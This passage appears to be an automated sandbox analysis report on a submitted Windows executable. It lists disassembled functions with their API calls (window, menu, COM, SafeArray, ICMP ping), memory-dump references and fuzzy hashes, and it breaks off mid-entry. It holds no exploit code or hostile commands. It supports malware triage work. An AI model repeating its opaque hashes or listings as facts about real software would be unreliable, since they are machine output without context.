                                          • CoCreateInstance.OLE32(00992D7C,00000000,00000001,009B8C1C,?), ref: 0096D6DD
                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0096D74C
                                          • CoTaskMemFree.OLE32(?,?), ref: 0096D7A4
                                          • _memset.LIBCMT ref: 0096D7E1
                                          • SHBrowseForFolderW.SHELL32(?), ref: 0096D81D
                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0096D840
                                          • CoTaskMemFree.OLE32(00000000), ref: 0096D847
                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0096D87E
                                          • CoUninitialize.OLE32(00000001,00000000), ref: 0096D880
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                          • String ID:
                                          • API String ID: 1246142700-0
                                          • Opcode ID: c30be50a87430fbf821270c3a5cbace706b8c987ddcbf5b9c3019bf8f2cf52de
                                          • Instruction ID: 876d425fb1f11e99839a9a7efd6eda506f06503c252c1ac2c0f2f49f227739fe
                                          • Opcode Fuzzy Hash: c30be50a87430fbf821270c3a5cbace706b8c987ddcbf5b9c3019bf8f2cf52de
                                          • Instruction Fuzzy Hash: 00B1EE75A00109AFDB04DF64C898EAEBBB9FF89314F148469F919DB261DB30ED45CB50
                                          Function 0095C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,00000001), ref: 0095C283
                                          • GetWindowRect.USER32(00000000,?), ref: 0095C295
                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0095C2F3
                                          • GetDlgItem.USER32(?,00000002), ref: 0095C2FE
                                          • GetWindowRect.USER32(00000000,?), ref: 0095C310
                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0095C364
                                          • GetDlgItem.USER32(?,000003E9), ref: 0095C372
                                          • GetWindowRect.USER32(00000000,?), ref: 0095C383
                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0095C3C6
                                          • GetDlgItem.USER32(?,000003EA), ref: 0095C3D4
                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0095C3F1
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0095C3FE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$ItemMoveRect$Invalidate
                                          • String ID:
                                          • API String ID: 3096461208-0
                                          • Opcode ID: 38ca12c1e73627c55d324cf6a67402a7920520d0172e1342a182816f10cd55d4
                                          • Instruction ID: b86c7bef8e38eef44d9e4259d620da40610c90137571392dbacd436f1135705a
                                          • Opcode Fuzzy Hash: 38ca12c1e73627c55d324cf6a67402a7920520d0172e1342a182816f10cd55d4
                                          • Instruction Fuzzy Hash: 7E5141B1B10209AFDB18CFA9DD99A6DBBB9EB88311F14812DF915D6290D7709D448B10
                                          Function 0090201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00901B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00902036,?,00000000,?,?,?,?,009016CB,00000000,?), ref: 00901B9A
                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 009020D3
                                          • KillTimer.USER32(-00000001,?,?,?,?,009016CB,00000000,?,?,00901AE2,?,?), ref: 0090216E
                                          • DestroyAcceleratorTable.USER32(00000000), ref: 0093BCA6
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009016CB,00000000,?,?,00901AE2,?,?), ref: 0093BCD7
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009016CB,00000000,?,?,00901AE2,?,?), ref: 0093BCEE
                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,009016CB,00000000,?,?,00901AE2,?,?), ref: 0093BD0A
                                          • DeleteObject.GDI32(00000000), ref: 0093BD1C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                          • String ID:
                                          • API String ID: 641708696-0
                                          • Opcode ID: 674dca528af36d7118f5d09303008df221ad7773d92ce1a4b6132738280348a7
                                          • Instruction ID: e07f2a5e8144861fafe316bfe2ac4b5db3f82ad0ce660ad091426dfb956ef16c
                                          • Opcode Fuzzy Hash: 674dca528af36d7118f5d09303008df221ad7773d92ce1a4b6132738280348a7
                                          • Instruction Fuzzy Hash: C8616931928B00DFDB359F14D958B2AB7F6FB40312F509929E5828AAB0C774A891EF51
                                          Function 009021A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 009025DB: GetWindowLongW.USER32(?,000000EB), ref: 009025EC
                                          • GetSysColor.USER32(0000000F), ref: 009021D3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ColorLongWindow
                                          • String ID:
                                          • API String ID: 259745315-0
                                          • Opcode ID: 6d11e2e6edfa29826f03f9b67aed4ba17867a7e649723ba3a937f03511d9c939
                                          • Instruction ID: ff380b26fb47087058290a7770af4c0a6efdf48afe924542a596f839a6639cb4
                                          • Opcode Fuzzy Hash: 6d11e2e6edfa29826f03f9b67aed4ba17867a7e649723ba3a937f03511d9c939
                                          • Instruction Fuzzy Hash: E2416F31108540EFDB295F6CDC9CBB93B69EB46331F244265FE658A2E5C7318C82EB61
                                          Function 0096A8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharLowerBuffW.USER32(?,?,0098F910), ref: 0096A90B
                                          • GetDriveTypeW.KERNEL32(00000061,009B89A0,00000061), ref: 0096A9D5
                                          • _wcscpy.LIBCMT ref: 0096A9FF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: BuffCharDriveLowerType_wcscpy
                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                          • API String ID: 2820617543-1000479233
                                          • Opcode ID: aa2d1cd4b15716edd78241767c5fa6ef605bef6fedc65734b056dd8be903fa36
                                          • Instruction ID: 7eb9604f2e2bc3bbeeecac07c3adb2d851bf584c58dcbf3a246e41e574594822
                                          • Opcode Fuzzy Hash: aa2d1cd4b15716edd78241767c5fa6ef605bef6fedc65734b056dd8be903fa36
                                          • Instruction Fuzzy Hash: 93517831118301AFC710EF14D992AAFB7A9EFC4354F64482AF996672A2DB319909CA53
                                          Function 00909837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: __i64tow__itow__swprintf
                                          • String ID: %.15g$0x%p$False$True
                                          • API String ID: 421087845-2263619337
                                          • Opcode ID: be07271bf80b6d6a5a10715eb31706a0e08f4ed91d87050ff035a971eaa81e70
                                          • Instruction ID: c76cc5ccf826367ce487161df1fa5481664a5e846d7107536a13139ef3a24510
                                          • Opcode Fuzzy Hash: be07271bf80b6d6a5a10715eb31706a0e08f4ed91d87050ff035a971eaa81e70
                                          • Instruction Fuzzy Hash: F041C371904205AFDB24EF74D856F7A73ECEF85310F20886EF949DA2D2EA35A9418B10
                                          Function 00987152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0098716A
                                          • CreateMenu.USER32 ref: 00987185
                                          • SetMenu.USER32(?,00000000), ref: 00987194
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00987221
                                          • IsMenu.USER32(?), ref: 00987237
                                          • CreatePopupMenu.USER32 ref: 00987241
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0098726E
                                          • DrawMenuBar.USER32 ref: 00987276
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                          • String ID: 0$F
                                          • API String ID: 176399719-3044882817
                                          • Opcode ID: 32e425742ce0db771b39c1f0e1d56b67e6ed19b06f4e967e348f84e1516bf1ad
                                          • Instruction ID: 57e9adbae890dd9597679b6b350cb9144a2694ca4fdd31ed351cc6572bae86a8
                                          • Opcode Fuzzy Hash: 32e425742ce0db771b39c1f0e1d56b67e6ed19b06f4e967e348f84e1516bf1ad
                                          • Instruction Fuzzy Hash: E2415B74A15205EFDB10DFA4D898EAABBB9FF49310F240028F91597361D731A910DF90
                                          Function 009874BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0098755E
                                          • CreateCompatibleDC.GDI32(00000000), ref: 00987565
                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00987578
                                          • SelectObject.GDI32(00000000,00000000), ref: 00987580
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0098758B
                                          • DeleteDC.GDI32(00000000), ref: 00987594
                                          • GetWindowLongW.USER32(?,000000EC), ref: 0098759E
                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 009875B2
                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 009875BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                          • String ID: static
                                          • API String ID: 2559357485-2160076837
                                          • Opcode ID: c0152d1acc3e7d6ecf38e3cb0fb4b9feb6a5f8eededba8a6566f44272eb570a4
                                          • Instruction ID: 39f2978bca634a6f9d5836fff0051af512affb39eb5234791786b4eb314a8cfd
                                          • Opcode Fuzzy Hash: c0152d1acc3e7d6ecf38e3cb0fb4b9feb6a5f8eededba8a6566f44272eb570a4
                                          • Instruction Fuzzy Hash: A8316D32118218BBDF11AFA4DC08FDB7B69FF49320F210224FA15D62A0D735D811EBA4
                                          Function 00926E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00926E3E
                                            • Part of subcall function 00928B28: __getptd_noexit.LIBCMT ref: 00928B28
                                          • __gmtime64_s.LIBCMT ref: 00926ED7
                                          • __gmtime64_s.LIBCMT ref: 00926F0D
                                          • __gmtime64_s.LIBCMT ref: 00926F2A
                                          • __allrem.LIBCMT ref: 00926F80
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00926F9C
                                          • __allrem.LIBCMT ref: 00926FB3
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00926FD1
                                          • __allrem.LIBCMT ref: 00926FE8
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00927006
                                          • __invoke_watson.LIBCMT ref: 00927077
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                          • String ID:
                                          • API String ID: 384356119-0
                                          • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                          • Instruction ID: 70abe175c96e94e09e6f2edeb499a300f8f9f17cf85aa7e547ab5aa67d971f98
                                          • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                          • Instruction Fuzzy Hash: 1F711776A40727ABDB14EF78EC41B9AB7A8AF44320F148239F414E76C5E770ED148B90
                                          Function 00962527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 00962542
                                          • GetMenuItemInfoW.USER32(009C5890,000000FF,00000000,00000030), ref: 009625A3
                                          • SetMenuItemInfoW.USER32(009C5890,00000004,00000000,00000030), ref: 009625D9
                                          • Sleep.KERNEL32(000001F4), ref: 009625EB
                                          • GetMenuItemCount.USER32(?), ref: 0096262F
                                          • GetMenuItemID.USER32(?,00000000), ref: 0096264B
                                          • GetMenuItemID.USER32(?,-00000001), ref: 00962675
                                          • GetMenuItemID.USER32(?,?), ref: 009626BA
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00962700
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00962714
                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00962735
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                          • String ID:
                                          • API String ID: 4176008265-0
                                          • Opcode ID: 2e0b4952057b3a2328453d419aba4fb9b43b19ce5d41e7731837dc8f91efe852
                                          • Instruction ID: b02d2f9eb115a7d031538aed3a68e04d96e8c3566465168095c089873192a93e
                                          • Opcode Fuzzy Hash: 2e0b4952057b3a2328453d419aba4fb9b43b19ce5d41e7731837dc8f91efe852
                                          • Instruction Fuzzy Hash: 5561AFB0914A49AFDF21CFA4DC98EBE7BBCEB41344F14046AF842A7291D731AD05DB21
                                          Function 00986F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00986FA5
                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00986FA8
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00986FCC
                                          • _memset.LIBCMT ref: 00986FDD
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00986FEF
                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00987067
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageSend$LongWindow_memset
                                          • String ID:
                                          • API String ID: 830647256-0
                                          • Opcode ID: beec32aa9017c060c4fa9f52273bf3af9dab2f35a6adac0e218eda695b27a7a0
                                          • Instruction ID: cb913d2276d5d4f5b673f8957ac38d057e0604e21a1acdce25e5c599fe7de4d4
                                          • Opcode Fuzzy Hash: beec32aa9017c060c4fa9f52273bf3af9dab2f35a6adac0e218eda695b27a7a0
                                          • Instruction Fuzzy Hash: 16616A75904208AFDB11DFA4CC85FEEB7B8AB49710F240159FA14EB3A1C771AD41DBA0
                                          Function 00956B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00956BBF
                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00956C18
                                          • VariantInit.OLEAUT32(?), ref: 00956C2A
                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00956C4A
                                          • VariantCopy.OLEAUT32(?,?), ref: 00956C9D
                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00956CB1
                                          • VariantClear.OLEAUT32(?), ref: 00956CC6
                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00956CD3
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00956CDC
                                          • VariantClear.OLEAUT32(?), ref: 00956CEE
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00956CF9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                          • String ID:
                                          • API String ID: 2706829360-0
                                          • Opcode ID: ed37bf04a62f497f54e948fb9bcc9b22f5e3a8204b887befa6f292c67612772f
                                          • Instruction ID: e13ab8c0e6a0192ff6d8ddbd1ee734ec88a78fe1078eb6e2094816a05995354b
                                          • Opcode Fuzzy Hash: ed37bf04a62f497f54e948fb9bcc9b22f5e3a8204b887befa6f292c67612772f
                                          • Instruction Fuzzy Hash: 82416071A042199FCF00DFA9D858AAEBBB9FF48351F408069ED55E7361CB30A949DF90
                                          Function 009783BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00909837: __itow.LIBCMT ref: 00909862
                                            • Part of subcall function 00909837: __swprintf.LIBCMT ref: 009098AC
                                          • CoInitialize.OLE32 ref: 00978403
                                          • CoUninitialize.OLE32 ref: 0097840E
                                          • CoCreateInstance.OLE32(?,00000000,00000017,00992BEC,?), ref: 0097846E
                                          • IIDFromString.OLE32(?,?), ref: 009784E1
                                          • VariantInit.OLEAUT32(?), ref: 0097857B
                                          • VariantClear.OLEAUT32(?), ref: 009785DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                          • API String ID: 834269672-1287834457
                                          • Opcode ID: a431f30c5d9e0d5414e10baf3572b67ba29cb47443aead86ff323bcd68e9690a
                                          • Instruction ID: 389c95da6de78627db3542e4656dbf3c0a04d522d37df7cd159b2c3bd423851e
                                          • Opcode Fuzzy Hash: a431f30c5d9e0d5414e10baf3572b67ba29cb47443aead86ff323bcd68e9690a
                                          • Instruction Fuzzy Hash: 2C61B2726483129FC710DF64C84CF6BB7E8AF89754F008859F9899B2A1CB74ED44CB92
                                          Function 00975732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WSAStartup.WSOCK32(00000101,?), ref: 00975793
                                          • inet_addr.WSOCK32(?,?,?), ref: 009757D8
                                          • gethostbyname.WSOCK32(?), ref: 009757E4
                                          • IcmpCreateFile.IPHLPAPI ref: 009757F2
                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00975862
                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00975878
                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 009758ED
                                          • WSACleanup.WSOCK32 ref: 009758F3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                          • String ID: Ping
                                          • API String ID: 1028309954-2246546115
                                          • Opcode ID: 85b49ef428d52ce04e069301b69baa83b392dcf4829693a20f22fab991a05041
                                          • Instruction ID: 7c4effcee7c4ad2838c1c39d97eb0f2f5b76866f57ef8a90fc5d4dd3b9de7aa2
